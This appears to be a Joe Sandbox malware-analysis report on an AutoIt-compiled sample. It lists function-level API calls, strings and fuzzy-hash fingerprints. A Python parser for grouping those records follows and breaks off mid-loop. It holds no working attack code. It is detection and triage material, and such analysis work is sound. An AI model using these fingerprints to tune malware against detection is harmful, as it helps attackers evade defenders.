                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: a143aff3ad618c6077450115f701b326c58d918dea01a80a964c1f19891a2a98
                                        • Instruction ID: 1a35d1f4cb2c882d874d594964da0d13c4c40a6c2ca859f51e3b7aa06f49956b
                                        • Opcode Fuzzy Hash: a143aff3ad618c6077450115f701b326c58d918dea01a80a964c1f19891a2a98
                                        • Instruction Fuzzy Hash: 3F112C72520209AFDF05DFB8D849EEA7BB8FB08354F004529FA55D3240E639E851DB50
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 007D94A6
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D94B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 84a0335fbb7146f808ab754b3a3baa5573afdec1147823f7b61a7c132b140275
                                        • Instruction ID: baa601897a4559fcd51a9bfbc4615341a812485a45eb10b8d9c6c4669d0d8423
                                        • Opcode Fuzzy Hash: 84a0335fbb7146f808ab754b3a3baa5573afdec1147823f7b61a7c132b140275
                                        • Instruction Fuzzy Hash: 18116D71100244AFEB119EA4DC84AFB377AEB05378F108726FA65972D1C679DC529B60
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C544C
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C5475
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 569847fd082ef5ce6cdc01dc99e4ca69d11fff971b0a20637b4202f800e92363
                                        • Instruction ID: 34e04a6b8eff29d5df77a68bcec83fe8f58fecae3297040d5916142bd6a2cb91
                                        • Opcode Fuzzy Hash: 569847fd082ef5ce6cdc01dc99e4ca69d11fff971b0a20637b4202f800e92363
                                        • Instruction Fuzzy Hash: 86119E70141AA1BADB298F518C84FFBFBA8FF12752F10822EF54596040E3796AC0C6B0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: htonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 3832099526-2422070025
                                        • Opcode ID: 1973925f7f426583a21374657c89157a10547695e229341f0b53503650e942bd
                                        • Instruction ID: 059cf48287581e4a7e9a3a81d98763245c39b08c817a6ea9da36ebef2633af7f
                                        • Opcode Fuzzy Hash: 1973925f7f426583a21374657c89157a10547695e229341f0b53503650e942bd
                                        • Instruction Fuzzy Hash: A001D274200209ABCB20AFA4C846FADB364FF4872AF20851EF5169B6D1D679EC04C766
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007AC5E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1456604079-1403004172
                                        • Opcode ID: 50f72201a39b8e8709f228a1050134db1ce2591b31c3a5fa663cf9bec59a3438
                                        • Instruction ID: 1e79db34cd41054f1a3582f8f4864ffce4d6f562ffe511a258e8334a82ffe13c
                                        • Opcode Fuzzy Hash: 50f72201a39b8e8709f228a1050134db1ce2591b31c3a5fa663cf9bec59a3438
                                        • Instruction Fuzzy Hash: 3C01F531601228FBCB0AEBA8CC569FE3369AB873507144718F473E72C1DA3868188750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_memmove
                                        • String ID: EA06
                                        • API String ID: 1988441806-3962188686
                                        • Opcode ID: c3064832c22cbd555ed43a92a8698af9f010629b64630c8e29b0888e395e0bd5
                                        • Instruction ID: 73794f55c817479a5aba1a2fd013450edbeccd49f2d461aeac56c94f731e3f11
                                        • Opcode Fuzzy Hash: c3064832c22cbd555ed43a92a8698af9f010629b64630c8e29b0888e395e0bd5
                                        • Instruction Fuzzy Hash: 4301F572900258BEDB28D7A8D85AFFE7BF89B05311F00815AE193D2181E4B8A7088B60
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 007AC4E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1456604079-1403004172
                                        • Opcode ID: a9ac92bc2e99ddf7fd582b69082f7aa35534523be752e557e829e3c503737e90
                                        • Instruction ID: 78c4c60d72868d148a1a84c82e9168b51166cef99813defdb4724722be935b21
                                        • Opcode Fuzzy Hash: a9ac92bc2e99ddf7fd582b69082f7aa35534523be752e557e829e3c503737e90
                                        • Instruction Fuzzy Hash: 5A01DF71641118FBCB06EBA4C967AFF37A89B8A340F148129E503E32C1DA5C5E0892A5
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 007AC562
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1456604079-1403004172
                                        • Opcode ID: 9e8b53b615b6ff9dfed071bc1b4cb20721241901cf19cb9d87bde994b51ab22e
                                        • Instruction ID: d2681ed8a9e429a319fed7d27e2d1cde1e018b49fa485ef25456fbee172db0da
                                        • Opcode Fuzzy Hash: 9e8b53b615b6ff9dfed071bc1b4cb20721241901cf19cb9d87bde994b51ab22e
                                        • Instruction Fuzzy Hash: D501F271A00118BBCB02EBA4C903EFF33AC9B12741F248214F403F32C1DA5C9E189271
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp
                                        • String ID: #32770
                                        • API String ID: 2292705959-463685578
                                        • Opcode ID: cf7abe850bb6bf8c1ae48be0aed63141504d1462d7ec0d5eb1dc38c63f48e40e
                                        • Instruction ID: d1b828e4527589b4b2f9effd4e2f9494ccc9dd06598e0005179806d88b995b0c
                                        • Opcode Fuzzy Hash: cf7abe850bb6bf8c1ae48be0aed63141504d1462d7ec0d5eb1dc38c63f48e40e
                                        • Instruction Fuzzy Hash: 1DE0D83360022967D720EBA5AC0AFD7FBBCFB517A4F000026F924E3181D6789A85C7D4
                                        APIs
                                        • __umatherr.LIBCMT ref: 0079DA2A
                                          • Part of subcall function 0079DD86: __ctrlfp.LIBCMT ref: 0079DDE5
                                        • __ctrlfp.LIBCMT ref: 0079DA47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __ctrlfp$__umatherr
                                        • String ID: xn~
                                        • API String ID: 219961500-3915447016
                                        • Opcode ID: db59c922e04545948a4cd1e62fcf0f588025aa121cdd0c6c9c7bfef8a2ea3753
                                        • Instruction ID: 54b767fe825c5e495c6e4200778408dc8012b161cc9612b2cb7ad26cff47d761
                                        • Opcode Fuzzy Hash: db59c922e04545948a4cd1e62fcf0f588025aa121cdd0c6c9c7bfef8a2ea3753
                                        • Instruction Fuzzy Hash: 14E0927140860EEEDF117F80F80A6A97BA5FF04310F808095F98C150A6DFB689B4D767
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007AB36B
                                          • Part of subcall function 00792011: _doexit.LIBCMT ref: 0079201B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: 20eb12f6396765c35f7ca825c1be5279ef8cf649a216f19cea0057d85571b1ff
                                        • Instruction ID: d0f278a3ac5dd22281ea738fa8ec1d7067497ae36fe673360c631e1bc8279361
                                        • Opcode Fuzzy Hash: 20eb12f6396765c35f7ca825c1be5279ef8cf649a216f19cea0057d85571b1ff
                                        • Instruction Fuzzy Hash: 9BD0123138431872D61572A87C1FFD976889F05B91F014015BF08962C38ADD98D091D9
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?), ref: 007EBAB8
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007EBCAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DirectoryFreeLibrarySystem
                                        • String ID: WIN_XPe
                                        • API String ID: 510247158-3257408948
                                        • Opcode ID: 359194ccd1be9442259b87529c8b37ebcad0b0fb2f1db3f52aead615c32af6e4
                                        • Instruction ID: 61c6132bc79afe59b6a839ef31c6f84a70a51092b92f93013ef9172106bc4f2b
                                        • Opcode Fuzzy Hash: 359194ccd1be9442259b87529c8b37ebcad0b0fb2f1db3f52aead615c32af6e4
                                        • Instruction Fuzzy Hash: 25E0C970C0514DEFCF15DBA9D889AEDBBB9BB4C300F14C496E022B2150C7799A44DF25
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D84DF
                                        • PostMessageW.USER32(00000000), ref: 007D84E6
                                          • Part of subcall function 007B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B83CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: e228c7997fa9b5f2cc4ae504c5fff9137437e20760cd7d28cc67a24a570504f4
                                        • Instruction ID: 7211feef86867cfbde88c3748a920af6a5ba6896623257d7a0fcdaf243e15993
                                        • Opcode Fuzzy Hash: e228c7997fa9b5f2cc4ae504c5fff9137437e20760cd7d28cc67a24a570504f4
                                        • Instruction Fuzzy Hash: 69D0A73138031077E77063309C0FFD66648E714B01F0009147205EA1C0C8A8B800C624
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D849F
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D84B2
                                          • Part of subcall function 007B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B83CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 5102ae46961843061244d22d00d6149bd5464e91de9d021fe509edfad6a36394
                                        • Instruction ID: 686b5758c476f734dbfc146f9496633ce22ad1556a2e4a3cf442aefbbc53f27e
                                        • Opcode Fuzzy Hash: 5102ae46961843061244d22d00d6149bd5464e91de9d021fe509edfad6a36394
                                        • Instruction Fuzzy Hash: 64D0A932384310B7E770A330AC0FFEA6A48EB24B01F0009287209AA2C0C8A8B800C624
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 007BD01E
                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 007BD035
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: ad0dae44d08f0070bb50647d141b817c3a53187473fb8074c566d56336701b69
                                        • Instruction ID: 189ff7fdd8a9d2b1dbc2db9095cc4a2afdd16cdbd5469e94d7be41236625bd43
                                        • Opcode Fuzzy Hash: ad0dae44d08f0070bb50647d141b817c3a53187473fb8074c566d56336701b69
                                        • Instruction Fuzzy Hash: E0D05EB154030EBBDB20ABA0ED0EFA97B6CB700704F1081907614D10D1D2F8DA85DBA4
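The per-function records in this section (APIs, Strings, Similarity IDs, fuzzy hashes) are what a triage analyst pivots on when clustering functions across samples or pulling out the handful of calls worth a closer look. The following parser is an added example and is not part of the Joe Sandbox report or of Joe Security's tooling. It assumes the layout as rendered on this page (a record begins at its "APIs" header and its Similarity fields follow), which is an assumption about the rendering, not a documented export format. The three records embedded inline are copied from the entries above, with the repeated Memory Dump Source lines and the Opcode/Instruction ID lines trimmed.

```python
"""Parse Joe Sandbox IDA-plugin function records and group them by fingerprint.

Added example (not Joe Sandbox code).  Record boundaries are an assumption
drawn from the page layout: a record starts at an 'APIs' header, and any
'• Key: Value' line after that is stored as a field of that record.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: three records copied from the report above, trimmed.
SAMPLE_RECORDS = """\
APIs
  • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
• SendMessageW.USER32(?,00000180,00000000,?), ref: 007AC4E1
Strings
Similarity
• API ID: MessageSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 1456604079-1403004172
• Opcode Fuzzy Hash: a9ac92bc2e99ddf7fd582b69082f7aa35534523be752e557e829e3c503737e90
• Instruction Fuzzy Hash: 5A01DF71641118FBCB06EBA4C967AFF37A89B8A340F148129E503E32C1DA5C5E0892A5
APIs
  • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
• SendMessageW.USER32(?,00000182,?,00000000), ref: 007AC562
Strings
Similarity
• API ID: MessageSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 1456604079-1403004172
• Opcode Fuzzy Hash: 9e8b53b615b6ff9dfed071bc1b4cb20721241901cf19cb9d87bde994b51ab22e
• Instruction Fuzzy Hash: D501F271A00118BBCB02EBA4C903EFF33AC9B12741F248214F403F32C1DA5C9E189271
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 007BD01E
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 007BD035
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode Fuzzy Hash: ad0dae44d08f0070bb50647d141b817c3a53187473fb8074c566d56336701b69
• Instruction Fuzzy Hash: E0D05EB154030EBBDB20ABA0ED0EFA97B6CB700704F1081907614D10D1D2F8DA85DBA4
"""

# '• Name.MODULE(args), ref: ADDR' for direct calls; the optional
# 'Part of subcall function ADDR:' prefix marks calls inherited from a callee.
API_LINE = re.compile(
    r"^• (?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
FIELD_LINE = re.compile(r"^• (?P<key>[^:]+): (?P<value>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: str                      # call-site address inside the dumped image
    via_subcall: str | None = None  # callee address when the call is indirect


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    @property
    def api_string_id(self) -> str:
        return self.fields.get("API String ID", "")

    @property
    def fuzzy_hash(self) -> str:
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":          # every function record opens with its APIs block
            records.append(FunctionRecord())
            section = "APIs"
            continue
        if not records:
            continue                # text before the first record is ignored
        if line in SECTION_HEADERS:
            section = line
            continue
        rec = records[-1]
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
                rec.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            rec.fields[m["key"].strip()] = m["value"].strip()
    return records


def group_by_fingerprint(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """Bucket functions by API String ID (same imported API set + same string set)."""
    groups: dict[str, list[str]] = defaultdict(list)
    for rec in records:
        groups[rec.api_string_id].append(rec.fuzzy_hash)
    return dict(groups)


def find_calls(records: list[FunctionRecord], api_name: str) -> list[tuple[str, tuple[str, ...]]]:
    """(call-site, args) for every direct use of api_name, ignoring inherited subcalls."""
    return [(c.ref, c.args) for rec in records for c in rec.calls
            if c.name == api_name and c.via_subcall is None]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for fp, hashes in group_by_fingerprint(recs).items():
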